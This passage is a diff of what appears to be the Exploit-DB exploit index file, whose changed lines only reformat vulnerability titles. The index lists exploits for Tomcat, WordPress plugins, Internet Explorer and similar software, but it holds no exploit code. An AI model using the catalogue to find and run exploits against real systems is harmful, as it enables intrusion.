MX - Missing Template Cross-Site Scripting Vulnerability",2002-06-13,Macromedia,cfm,remote,0 21549,platforms/windows/local/21549.txt,"Microsoft SQL Server 2000 Password Encrypt Procedure Buffer Overflow Vulnerability",2002-06-14,"Martin Rakhmanoff",windows,local,0 21550,platforms/windows/local/21550.txt,"Lumigent Log Explorer XP_LogAttach_StartProf Buffer Overflow Vulnerability",2002-06-14,"Martin Rakhmanoff",windows,local,0 21551,platforms/windows/local/21551.txt,"Lumigent Log Explorer 3.0.1 XP_LogAttach_SetPort Buffer Overflow Vulnerability",2002-06-14,"Martin Rakhmanoff",windows,local,0 @@ -18880,8 +18880,8 @@ id,file,description,date,author,platform,type,port 21601,platforms/windows/remote/21601.c,"Microsoft Foundation Class Library 7.0 ISAPI Buffer Overflow Vulnerability",2002-07-08,"Matthew Murphy",windows,remote,0 21602,platforms/linux/remote/21602.txt,"icecast server 1.3.12 - Directory Traversal information disclosure Vulnerability",2002-07-09,glaive,linux,remote,0 21603,platforms/multiple/remote/21603.txt,"iPlanet Web Server 4.1 - Search Component File Disclosure Vulnerability",2002-07-09,"Qualys Corporation",multiple,remote,0 -21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 Servlet Mapping Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",linux,remote,0 -21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 DoS Device Name Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 +21604,platforms/linux/remote/21604.txt,"Apache Tomcat 4.0.3 - Servlet Mapping Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",linux,remote,0 +21605,platforms/windows/remote/21605.txt,"Apache Tomcat 4.0.3 - DoS Device Name Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 21606,platforms/windows/remote/21606.txt,"Microsoft Internet Explorer 5/6 OBJECT Tag Same Origin Policy Violation Vulnerability",2002-07-10,"Thor Larholm",windows,remote,0 21607,platforms/windows/remote/21607.txt,"GoAhead WebServer 2.1.x URL Encoded Slash Directory Traversal Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 21608,platforms/windows/remote/21608.txt,"GoAhead WebServer 2.1.x Error Page Cross-Site Scripting Vulnerability",2002-07-10,"Matt Moore",windows,remote,0 @@ -18923,7 +18923,7 @@ id,file,description,date,author,platform,type,port 21643,platforms/windows/remote/21643.c,"CodeBlue 5.1 SMTP Response Buffer Overflow Vulnerability",2002-07-24,doe,windows,remote,0 21644,platforms/unix/dos/21644.txt,"Pine 4.x Empty MIME Boundary Denial of Service Vulnerability",2002-07-24,"Martin J. Muench",unix,dos,0 21645,platforms/windows/dos/21645.txt,"Foxit Reader 5.4.3.0920 Crash PoC",2012-10-01,coolkaveh,windows,dos,0 -21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 +21646,platforms/php/webapps/21646.py,"Archin WordPress Theme 3.2 - Unauthenticated Configuration Access",2012-10-01,bwall,php,webapps,0 21648,platforms/windows/remote/21648.txt,"Pegasus Mail 4.0 1 Message Header Buffer Overflow Vulnerability",2002-07-24,"Auriemma Luigi",windows,remote,0 21649,platforms/multiple/remote/21649.txt,"CacheFlow CacheOS 3.1.x/4.0.x/4.1 Unresolved Domain Cross-Site Scripting Vulnerability",2002-07-24,T.Suzuki,multiple,remote,0 21651,platforms/windows/remote/21651.txt,"Microsoft SQL Server 2000 sp_MScopyscript SQL Injection Vulnerability",2002-07-25,"Cesar Cerrudo",windows,remote,0 @@ -18988,7 +18988,7 @@ id,file,description,date,author,platform,type,port 21711,platforms/windows/remote/21711.html,"Microsoft Outlook Express 5/6 MHTML URL Handler File Rendering Vulnerability",2002-08-15,http-equiv,windows,remote,0 21712,platforms/windows/dos/21712.txt,"Google Toolbar 1.1.60 - Search Function Denial of Service Vulnerability",2002-08-15,onet,windows,dos,0 21713,platforms/windows/local/21713.py,"Exploit: NCMedia Sound Editor Pro 7.5.1 - SEH & DEP",2012-10-03,b33f,windows,local,0 -21715,platforms/php/webapps/21715.txt,"Wordpress Plugin spider calendar Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 +21715,platforms/php/webapps/21715.txt,"Wordpress Plugin spider calendar - Multiple Vulnerabilities",2012-10-03,D4NB4R,php,webapps,0 21716,platforms/php/webapps/21716.txt,"Omnistar Mailer 7.2 - Multiple Vulnerabilities",2012-10-03,Vulnerability-Lab,php,webapps,0 21717,platforms/windows/remote/21717.txt,"Microsoft Windows XP HCP URI Handler Abuse Vulnerability",2002-08-15,"Shane Hird",windows,remote,0 21718,platforms/windows/remote/21718.txt,"Microsoft SQL 2000/7.0 Agent Jobs Privilege Elevation Vulnerability",2002-08-15,"David Litchfield",windows,remote,0 @@ -19007,7 +19007,7 @@ id,file,description,date,author,platform,type,port 21731,platforms/novell/remote/21731.pl,"Novell NetWare 5.1/6.0 HTTP Post Arbitrary Perl Code Execution Vulnerability",2002-08-20,"Dan Elder",novell,remote,0 21732,platforms/linux/local/21732.txt,"SCPOnly 2.3/2.4 - SSH Environment Shell Escaping Vulnerability",2002-08-20,"Derek D. Martin",linux,local,0 21733,platforms/linux/local/21733.sh,"Sun Cobalt RaQ 4.0 Predictable Temporary Filename Symbolic Link Attack Vulnerability",2002-06-28,"Charles Stevenson",linux,local,0 -21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 JSP Request Cross-Site Scripting Vulnerability",2002-08-21,Skinnay,unix,remote,0 +21734,platforms/unix/remote/21734.txt,"Apache Tomcat 4.1 - JSP Request Cross-Site Scripting Vulnerability",2002-08-21,Skinnay,unix,remote,0 21735,platforms/windows/remote/21735.txt,"Abyss Web Server 1.0 Encoded Backslash Directory Traversal Vulnerability",2002-08-22,"Auriemma Luigi",windows,remote,0 21736,platforms/hardware/dos/21736.txt,"LG LR3100p 1.30 Series Router IP Packet Flags Denial of Service Vulnerability",2002-08-22,"Lukasz Bromirski",hardware,dos,0 21737,platforms/windows/dos/21737.txt,"Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability",2012-10-04,"Francis Provencher",windows,dos,0 @@ -19125,7 +19125,7 @@ id,file,description,date,author,platform,type,port 21850,platforms/linux/remote/21850.rb,"Samba SetInformationPolicy AuditEventsInfo Heap Overflow",2012-10-10,metasploit,linux,remote,0 21851,platforms/unix/remote/21851.rb,"Webmin /file/show.cgi Remote Command Execution",2012-10-10,metasploit,unix,remote,10000 21852,platforms/unix/remote/21852.rb,"QNX QCONN Remote Command Execution Vulnerability",2012-10-10,metasploit,unix,remote,0 -21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 DefaultServlet File Disclosure Vulnerability",2002-09-24,"Rossen Raykov",unix,remote,0 +21853,platforms/unix/remote/21853.txt,"Apache Tomcat 3/4 - DefaultServlet File Disclosure Vulnerability",2002-09-24,"Rossen Raykov",unix,remote,0 21854,platforms/linux/dos/21854.c,"Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability",2002-09-24,"K.C. Wong",linux,dos,0 21855,platforms/php/webapps/21855.txt,"PHPNuke 6.0/6.5 - Search Form Cross-Site Scripting Vulnerability",2002-09-24,"Mark Grimes",php,webapps,0 21856,platforms/multiple/local/21856.txt,"OpenVms 5.3/6.2/7.x UCX POP Server Arbitrary File Modification Vulnerability",2002-09-25,"Mike Riley",multiple,local,0 @@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port 22068,platforms/unix/dos/22068.pl,"Apache 1.3.x & Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service Vulnerability",2002-12-04,Sapient2003,unix,dos,0 22069,platforms/multiple/local/22069.py,"Oracle Database Authentication Protocol Security Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0 22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Stored XSS Vulnerability",2012-10-18,"Mike Eduard",windows,webapps,0 -22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 +22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate Wordpress Plugin 2.06.01 - SQL Injection Vulnerability",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0 22074,platforms/osx/local/22074.txt,"Apple Mac OS X 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,local,0 22075,platforms/php/webapps/22075.txt,"Ultimate PHP Board 1.0 final beta ViewTopic.PHP Directory Contents Browsing",2002-11-08,euronymous,php,webapps,0 22076,platforms/php/webapps/22076.txt,"Ultimate PHP Board Board 1.0 final beta ViewTopic.PHP Cross-Site Scripting Vulnerability",2002-11-08,euronymous,php,webapps,0 @@ -19357,7 +19357,7 @@ id,file,description,date,author,platform,type,port 22097,platforms/php/webapps/22097.txt,"Joomla Freestyle Support 1.9.1.1447 (com_fss) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22098,platforms/php/webapps/22098.txt,"Joomla Tags (index.php tag parameter) SQL Injection",2012-10-19,D4NB4R,php,webapps,0 22099,platforms/php/webapps/22099.txt,"CMSQLITE 1.3.2 - Multiple Vulnerabiltiies",2012-10-19,Vulnerability-Lab,php,webapps,0 -22100,platforms/windows/dos/22100.txt,"Internet Explorer 9 - XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 +22100,platforms/windows/dos/22100.txt,"Microsoft Internet Explorer 9 - XSS Filter Bypass",2012-10-19,"Jean Pascal Pereira",windows,dos,0 22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 say() Format String Vulnerability",2002-12-16,"Marceta Milos",linux,remote,0 22102,platforms/php/webapps/22102.txt,"PHP-Nuke 6.0 - Multiple Path Disclosure Vulnerabilities",2002-12-16,frog,php,webapps,0 22103,platforms/php/webapps/22103.txt,"PHP-Nuke 6.0 - Multiple Cross-Site Scripting Vulnerabilities",2002-12-16,frog,php,webapps,0 @@ -19462,7 +19462,7 @@ id,file,description,date,author,platform,type,port 22202,platforms/php/webapps/22202.txt,"FTLS GuestBook 1.1 Script Injection Vulnerability",2003-01-25,BrainRawt,php,webapps,0 22203,platforms/solaris/local/22203.txt,"Sun Solaris 2.5/2.6/7.0/8/9 AT Command Arbitrary File Deletion Vulnerability",2003-01-27,"Wojciech Purczynski",solaris,local,0 22204,platforms/cgi/webapps/22204.txt,"MultiHTML 1.5 File Disclosure Vulnerability",2000-09-13,"Niels Heinen",cgi,webapps,0 -22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability",2003-01-26,"Jouko Pynnönen",linux,remote,0 +22205,platforms/linux/remote/22205.txt,"Apache Tomcat 3.x - Null Byte Directory/File Disclosure Vulnerability",2003-01-26,"Jouko Pynnönen",linux,remote,0 22206,platforms/php/webapps/22206.txt,"Nukebrowser 2.x - Remote File Include Vulnerability",2003-01-30,Havenard,php,webapps,0 22207,platforms/multiple/dos/22207.txt,"3ware Disk Managment 1.10 Malformed HTTP Request DoS Vulnerability",2003-01-30,"Nathan Neulinger",multiple,dos,0 22208,platforms/php/webapps/22208.txt,"myphpPageTool 0.4.3-1 - Remote File Include Vulnerability",2003-02-03,frog,php,webapps,0 @@ -19536,7 +19536,7 @@ id,file,description,date,author,platform,type,port 22278,platforms/linux/remote/22278.pl,"moxftp 2.2 Banner Parsing Buffer Overflow Vulnerability",2003-02-24,"Knud Erik Hojgaard",linux,remote,0 22280,platforms/windows/remote/22280.txt,"Microsoft Outlook2000/Express 6.0 - Arbitrary Program Execution Vulnerability",2003-02-24,http-equiv,windows,remote,0 22281,platforms/php/webapps/22281.php,"Mambo Site Server 4.0.12 RC2 Cookie Validation Vulnerability",2003-02-24,"Simen Bergo",php,webapps,0 -22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 -dev sendphoto.php File Disclosure Vulnerability",2003-02-24,frog,php,webapps,0 +22282,platforms/php/webapps/22282.txt,"WihPhoto 0.86 - dev sendphoto.php File Disclosure Vulnerability",2003-02-24,frog,php,webapps,0 22283,platforms/php/webapps/22283.txt,"CuteNews 0.88 shownews.php Remote File Include Vulnerability",2003-02-25,Over_G,php,webapps,0 22284,platforms/php/webapps/22284.txt,"CuteNews 0.88 - search.php Remote File Include Vulnerability",2003-02-25,Over_G,php,webapps,0 22285,platforms/php/webapps/22285.txt,"CuteNews 0.88 comments.php Remote File Include Vulnerability",2003-02-25,Over_G,php,webapps,0 @@ -19553,7 +19553,7 @@ id,file,description,date,author,platform,type,port 22296,platforms/multiple/remote/22296.txt,"Axis Communications HTTP Server 2.x Messages Information Disclosure Vulnerability",2003-02-28,"Martin Eiszner",multiple,remote,0 22297,platforms/php/webapps/22297.pl,"Typo3 3.5 b5 Showpic.PHP File Enumeration Vulnerability",2003-02-28,"Martin Eiszner",php,webapps,0 22298,platforms/php/webapps/22298.txt,"Typo3 3.5 b5 Translations.PHP Remote File Include Vulnerability",2003-02-28,"Martin Eiszner",php,webapps,0 -22300,platforms/php/webapps/22300.txt,"Wordpress Easy Webinar Plugin Blind SQL Injection Vulnerability",2012-10-28,"Robert Cooper",php,webapps,0 +22300,platforms/php/webapps/22300.txt,"Wordpress Easy Webinar Plugin - Blind SQL Injection Vulnerability",2012-10-28,"Robert Cooper",php,webapps,0 22301,platforms/windows/remote/22301.html,"Aladdin Knowledge System Ltd - PrivAgent.ocx ChooseFilePath BOF",2012-10-28,b33f,windows,remote,0 22302,platforms/windows/dos/22302.rb,"hMailServer 5.3.3 IMAP Remote Crash PoC",2012-10-28,"John Smith",windows,dos,0 22303,platforms/windows/dos/22303.pl,"Microsoft Windows Help program (WinHlp32.exe) Crash PoC",2012-10-28,coolkaveh,windows,dos,0 @@ -19648,9 +19648,9 @@ id,file,description,date,author,platform,type,port 22395,platforms/windows/dos/22395.txt,"eDonkey Clients 0.44/0.45 - Multiple Chat Dialog Resource Consumption Vulnerability",2003-03-21,"Auriemma Luigi",windows,dos,0 22396,platforms/php/webapps/22396.txt,"Wordpress bbpress Plugin - Multiple Vulnerabilities",2012-11-01,Dark-Puzzle,php,webapps,0 22397,platforms/windows/dos/22397.txt,"SIEMENS Sipass Integrated 2.6 Ethernet Bus Arbitrary Pointer Dereference",2012-11-01,"Lucas Apa",windows,dos,0 -22398,platforms/php/webapps/22398.php,"Invision Power Board <= 3.3.4 - ""unserialize()"" PHP Code Execution",2012-11-01,EgiX,php,webapps,0 +22398,platforms/php/webapps/22398.php,"Invision Power Board <= 3.3.4 - _unserialize()_ PHP Code Execution",2012-11-01,EgiX,php,webapps,0 22399,platforms/php/webapps/22399.txt,"Endpoint Protector 4.0.4.2 - Multiple Persistent XSS",2012-11-01,"CYBSEC Labs",php,webapps,0 -22401,platforms/windows/dos/22401.php,"Internet Explorer 9 Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 +22401,platforms/windows/dos/22401.php,"Microsoft Internet Explorer 9 - Memory Corruption Crash PoC",2012-11-01,"Jean Pascal Pereira",windows,dos,0 22402,platforms/windows/dos/22402.txt,"RealPlayer 15.0.6.14(.3g2) - WriteAV Crash PoC",2012-11-01,coolkaveh,windows,dos,0 22403,platforms/php/webapps/22403.txt,"Joomla Spider Catalog (index.php product_id parameter) SQL Injection Vulnerability",2012-11-01,D4NB4R,php,webapps,0 22405,platforms/php/webapps/22405.txt,"MyBB Follower User Plugin - SQL Injection",2012-11-01,Zixem,php,webapps,0 @@ -19711,7 +19711,7 @@ id,file,description,date,author,platform,type,port 22460,platforms/windows/dos/22460.txt,"Abyss Web Server 1.1.2 Incomplete HTTP Request Denial of Service Vulnerability",2003-04-05,"Auriemma Luigi",windows,dos,0 22461,platforms/php/webapps/22461.txt,"Invision Board 1.1.1 functions.php SQL Injection Vulnerability",2003-04-05,"Gossi The Dog",php,webapps,0 22462,platforms/multiple/remote/22462.txt,"Interbase 6.x External Table File Verification Vulnerability",2003-04-05,"Kotala Zdenek",multiple,remote,0 -22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0 +22463,platforms/php/webapps/22463.txt,"Wordpress Spider Catalog 1.1 - HTML Code Injection and Cross-Site scripting",2012-11-04,D4NB4R,php,webapps,0 22464,platforms/windows/dos/22464.txt,"Adobe Reader 11.0.0 - Stack Overflow Crash PoC",2012-11-04,coolkaveh,windows,dos,0 22465,platforms/windows/local/22465.txt,"Sysax FTP Automation Server 5.33 - Local Privilege Escalation",2012-11-04,"Craig Freyman",windows,local,0 22466,platforms/windows/remote/22466.py,"BigAnt Server 2.52 SP5 - SEH Stack Overflow ROP-based Exploit (ASLR + DEP bypass)",2012-11-04,"Lorenzo Cantoni",windows,remote,0 @@ -19790,7 +19790,7 @@ id,file,description,date,author,platform,type,port 22541,platforms/cgi/remote/22541.txt,"Alt-N WebAdmin 2.0.x - Remote File Viewing Vulnerability",2003-04-25,david@kamborio.net,cgi,remote,0 22542,platforms/cgi/remote/22542.txt,"Alt-N WebAdmin 2.0.x - Remote File Disclosure Vulnerability",2003-04-25,david@kamborio.net,cgi,remote,0 22543,platforms/php/webapps/22543.txt,"Onecenter Forum 4.0 IMG Tag Script Injection Vulnerability",2003-04-25,"David F. Madrid",php,webapps,0 -22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 Error Message Path Disclosure Vulnerability",2003-04-26,"Network Intelligence",cfm,webapps,0 +22544,platforms/cfm/webapps/22544.txt,"Macromedia ColdFusion MX 6.0 - Error Message Path Disclosure Vulnerability",2003-04-26,"Network Intelligence",cfm,webapps,0 22545,platforms/cgi/webapps/22545.pl,"Mike Bobbitt Album.PL 0.61 - Remote Command Execution Vulnerability",2003-04-26,aresu@bosen.net,cgi,webapps,0 22546,platforms/windows/remote/22546.txt,"Opera 7.0/7.10 JavaScript Console Single Quote Attribute Injection Vulnerability",2003-04-28,nesumin,windows,remote,0 22547,platforms/php/webapps/22547.php,"Invision Power Board <= 3.3.4 unserialize Regex Bypass",2012-11-07,webDEViL,php,webapps,0 @@ -19819,7 +19819,7 @@ id,file,description,date,author,platform,type,port 22572,platforms/cgi/webapps/22572.pl,"HappyMall E-Commerce Software 4.3/4.4 Member_HTML.CGI Command Execution Vulnerability",2003-05-08,"Revin Aldi",cgi,webapps,0 22573,platforms/freebsd/local/22573.pl,"ListProc 8.2.9 Catmail ULISTPROC_UMASK Buffer Overflow Vulnerability",2003-05-08,kf,freebsd,local,0 22574,platforms/freebsd/local/22574.pl,"Lgames LTris 1.0.1 - Local Memory Corruption Vulnerability",2003-05-09,"Knud Erik Hojgaard",freebsd,local,0 -22575,platforms/windows/remote/22575.txt,"Internet Explorer 5/6 file:// Request Zone Bypass Vulnerability",2003-05-09,"Marek Bialoglowy",windows,remote,0 +22575,platforms/windows/remote/22575.txt,"Microsoft Internet Explorer 5/6 - file:// Request Zone Bypass Vulnerability",2003-05-09,"Marek Bialoglowy",windows,remote,0 22576,platforms/windows/dos/22576.txt,"Microsoft SQL Server 7.0/2000 JET Database Engine 4.0 - Buffer Overrun Vulnerability",2003-05-09,cesaro,windows,dos,0 22577,platforms/php/webapps/22577.txt,"ttCMS 2.2 / ttForum 1.1 News.php template Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 22578,platforms/php/webapps/22578.txt,"ttCMS 2.2 / ttForum 1.1 install.php installdir Parameter Remote File Inclusion",2003-05-09,"Charles Reinold",php,webapps,0 @@ -20319,7 +20319,7 @@ id,file,description,date,author,platform,type,port 23087,platforms/hardware/dos/23087.c,"Check Point Firewall-1 4.x SecuRemote Internal Interface Address Information Leakage Vulnerability",2001-07-17,"Jim Becher",hardware,dos,0 23088,platforms/windows/dos/23088.pl,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service Vulnerability (1)",2003-09-02,_6mO_HaCk,windows,dos,0 23089,platforms/windows/dos/23089.c,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service Vulnerability (2)",2003-09-02,WARL0RD,windows,dos,0 -23090,platforms/windows/dos/23090.asm,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 -Random UDP Flood Denial of Service Vulnerability (3)",2003-09-02,"Igor Franchuk",windows,dos,0 +23090,platforms/windows/dos/23090.asm,"ZoneAlarm 3.7.202/PRO 4.0/PRO 4.5 - Random UDP Flood Denial of Service Vulnerability (3)",2003-09-02,"Igor Franchuk",windows,dos,0 23091,platforms/windows/remote/23091.txt,"FloosieTek FTGatePro 1.22 Mail Server Path Disclosure Vulnerability",2003-09-02,"Ziv Kamir",windows,remote,0 23092,platforms/windows/remote/23092.txt,"FloosieTek FTGatePro 1.22 Mail Server Cross-Site Scripting Vulnerability",2003-09-02,"Ziv Kamir",windows,remote,0 23093,platforms/windows/remote/23093.txt,"Microsoft Windows XP TCP Packet Information Leakage Vulnerability",2003-09-02,"Michal Zalewski",windows,remote,0 @@ -20439,7 +20439,7 @@ id,file,description,date,author,platform,type,port 23210,platforms/windows/local/23210.c,"Microsoft Windows XP/2000 PostThreadMessage() Arbitrary Process Killing Vulnerability",2003-10-02,"Brett Moore",windows,local,0 23211,platforms/windows/remote/23211.cpp,"EarthStation 5 - Search Service Remote File Deletion Vulnerabililty",2003-10-03,"random nut",windows,remote,0 23212,platforms/hardware/remote/23212.txt,"Cisco LEAP Password Disclosure Weakness",2003-10-03,"Cisco Security",hardware,remote,0 -23213,platforms/php/webapps/23213.txt,"Wordpress 0.6/0.7 Blog.Header.PHP SQL Injection Vulnerabilities",2003-10-03,"Seth Woolley",php,webapps,0 +23213,platforms/php/webapps/23213.txt,"Wordpress 0.6/0.7 Blog.Header.PHP - SQL Injection Vulnerabilities",2003-10-03,"Seth Woolley",php,webapps,0 23214,platforms/cgi/webapps/23214.txt,"Sun Cobalt RaQ 1.1/2.0/3.0/4.0 Message.CGI Cross-Site Scripting Vulnerability",2003-10-03,"Lorenzo Hernandez Garcia-Hierro",cgi,webapps,0 23215,platforms/windows/dos/23215.html,"Microsoft Internet Explorer 6 Absolute Position Block Denial of Service Vulnerability",2003-10-03,"Nick Johnson",windows,dos,0 23216,platforms/windows/dos/23216.txt,"Microsoft Word 97/98/2002 Malformed Document Denial of Service Vulnerability",2003-10-03,"Bahaa Naamneh",windows,dos,0 @@ -20470,7 +20470,7 @@ id,file,description,date,author,platform,type,port 23242,platforms/windows/dos/23242.pl,"WinSyslog Interactive Syslog Server 4.21/ long Message Remote Denial of Service Vulnerability",2003-10-14,storm@securiteam.com,windows,dos,0 23243,platforms/windows/remote/23243.py,"Free Float FTP Server USER Command Buffer Overflow",2012-12-09,D35m0nd142,windows,remote,0 23244,platforms/php/webapps/23244.txt,"WrenSoft Zoom Search Engine 2.0 Build: 1018 - Cross-Site Scripting Vulnerability",2003-10-14,Ezhilan,php,webapps,0 -23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x Non-HTTP Request Denial of Service Vulnerability",2003-10-15,"Oliver Karow",linux,dos,0 +23245,platforms/linux/dos/23245.pl,"Apache Tomcat 4.0.x - Non-HTTP Request Denial of Service Vulnerability",2003-10-15,"Oliver Karow",linux,dos,0 23246,platforms/windows/dos/23246.txt,"SumatraPDF 2.1.1/MuPDF 1.0 Integer Overflow",2012-12-09,beford,windows,dos,0 23247,platforms/windows/remote/23247.c,"Microsoft Windows XP/2000 Messenger Service Buffer Overrun Vulnerability",2003-10-25,Adik,windows,remote,0 23248,platforms/android/dos/23248.txt,"Android Kernel 2.6 - Local DoS Crash PoC",2012-12-09,G13,android,dos,0 @@ -20482,7 +20482,7 @@ id,file,description,date,author,platform,type,port 23253,platforms/php/webapps/23253.txt,"achievo 1.4.5 - Multiple Vulnerabilities",2012-12-09,"High-Tech Bridge SA",php,webapps,0 23254,platforms/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service Vulnerability",2012-12-09,"High-Tech Bridge SA",windows,dos,0 23255,platforms/windows/local/23255.cpp,"Microsoft ListBox/ComboBox Control User32.dll Function Buffer Overrun Vulnerability",2003-10-15,"Brett Moore",windows,local,0 -23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 SQL Error Message Cross-Site Scripting Vulnerability",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 +23256,platforms/cfm/webapps/23256.txt,"Macromedia ColdFusion MX 6.0 - SQL Error Message Cross-Site Scripting Vulnerability",2003-10-15,"Lorenzo Hernandez Garcia-Hierro",cfm,webapps,0 23257,platforms/multiple/remote/23257.txt,"Bajie HTTP Server 0.95 Example Scripts And Servlets Cross-Site Scripting Vulnerability",2003-10-16,"Oliver Karow",multiple,remote,0 23258,platforms/linux/local/23258.c,"Oracle Database Server 9.0.x Oracle Binary Local Buffer Overflow Vulnerability",2003-10-17,c0ntex,linux,local,0 23259,platforms/php/webapps/23259.txt,"GoldLink 3.0 Cookie SQL Injection Vulnerability",2003-10-18,Weke,php,webapps,0 @@ -20581,7 +20581,7 @@ id,file,description,date,author,platform,type,port 23353,platforms/php/webapps/23353.txt,"MyYoutube MyBB Plugin 1.0 - SQL Injection",2012-12-13,Zixem,php,webapps,0 23354,platforms/php/webapps/23354.txt,"MyBB AJAX Chat - Persistent XSS Vulnerability",2012-12-13,"Mr. P-teo",php,webapps,0 23355,platforms/php/webapps/23355.txt,"Facebook Profile MyBB Plugin 2.4 - Persistant XSS",2012-12-13,limb0,php,webapps,0 -23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 +23356,platforms/php/webapps/23356.txt,"Portable phpMyAdmin Wordpress Plugin - Authentication Bypass",2012-12-13,"Mark Stanislav",php,webapps,0 23384,platforms/php/webapps/23384.txt,"Koch Roland Rolis Guestbook 1.0 $path Remote File Include Vulnerability",2003-11-17,"RusH security team",php,webapps,0 23385,platforms/multiple/remote/23385.txt,"PostMaster 3.16/3.17 Proxy Service Cross-Site Scripting Vulnerability",2003-11-17,"Ziv Kamir",multiple,remote,0 23382,platforms/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,php,webapps,0 @@ -20640,8 +20640,8 @@ id,file,description,date,author,platform,type,port 23419,platforms/windows/remote/23419.txt,"Abyss Web Server 1.0/1.1 - Authentication Bypass Vulnerability",2003-12-08,"Luigi Auriemma",windows,remote,0 23420,platforms/php/webapps/23420.txt,"Bitfolge Snif 1.2.6 Index.PHP Path Cross-Site Scripting Vulnerability",2003-12-09,"Justin Hagstrom",php,webapps,0 23421,platforms/cgi/webapps/23421.txt,"calacode @mail webmail system 3.52 - Multiple Vulnerabilities",2003-12-09,"Nick Gudov",cgi,webapps,0 -23422,platforms/windows/remote/23422.txt,"Internet Explorer 5/6_Mozilla 1.2.1 URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 -23423,platforms/windows/remote/23423.txt,"Internet Explorer 5/6_Mozilla 1.2.1 URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 +23422,platforms/windows/remote/23422.txt,"Microsoft Internet Explorer 5/6_ Mozilla 1.2.1 - URI Display Obfuscation Weakness (1)",2003-12-09,"Guy Crumpley",windows,remote,0 +23423,platforms/windows/remote/23423.txt,"Microsoft Internet Explorer 5/6_ Mozilla 1.2.1 - URI Display Obfuscation Weakness (2)",2003-12-09,"Zap The Dingbat",windows,remote,0 23425,platforms/php/webapps/23425.txt,"MyBB User Profile Skype ID Plugin 1.0 - Stored XSS",2012-12-16,limb0,php,webapps,0 23449,platforms/unix/remote/23449.txt,"Xerox MicroServer Web Server Remote Directory Traversal Vulnerability",2003-12-19,"J.A. Gutierrez",unix,remote,0 23450,platforms/windows/remote/23450.txt,"PY Software Active Webcam 4.3 Webserver Directory Traversal Vulnerability",2003-12-19,"Luigi Auriemma",windows,remote,0 @@ -20668,7 +20668,7 @@ id,file,description,date,author,platform,type,port 23445,platforms/php/webapps/23445.txt,"osCommerce 2.2 osCsid Parameter Cross-Site Scripting Vulnerability",2003-12-17,JeiAr,php,webapps,0 23446,platforms/windows/remote/23446.txt,"GoAhead Webserver 2.1.x ASP Script File Source Code Disclosure Vulnerability",2002-12-17,"Luigi Auriemma",windows,remote,0 23447,platforms/cgi/webapps/23447.txt,"SiteInteractive Subscribe Me Setup.PL Arbitrary Command Execution Vulnerability",2003-12-18,"Paul Craig",cgi,webapps,0 -23448,platforms/php/webapps/23448.php,"phpwcms <= 1.5.4.6 - ""preg_replace"" - Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 +23448,platforms/php/webapps/23448.php,"phpwcms <= 1.5.4.6 - _preg_replace_ - Multiple Vulnerabilities",2012-12-17,aeon,php,webapps,0 23453,platforms/php/webapps/23453.txt,"BES-CMS 0.4/0.5 index.inc.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23454,platforms/php/webapps/23454.txt,"BES-CMS 0.4/0.5 members/index.inc.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 23455,platforms/php/webapps/23455.txt,"BES-CMS 0.4/0.5 message.php File Include Vulnerability",2003-12-20,frog,php,webapps,0 @@ -20759,7 +20759,7 @@ id,file,description,date,author,platform,type,port 23537,platforms/php/webapps/23537.txt,"VisualShapers EZContents 1.4/2.0 Module.PHP Remote Command Execution Vulnerability",2004-01-10,"Zero X",php,webapps,0 23538,platforms/windows/dos/23538.txt,"LionMax Software WWW File Share Pro 2.4/2.6 - Remote Denial of Service Vulnerability",2004-01-12,dr_insane,windows,dos,0 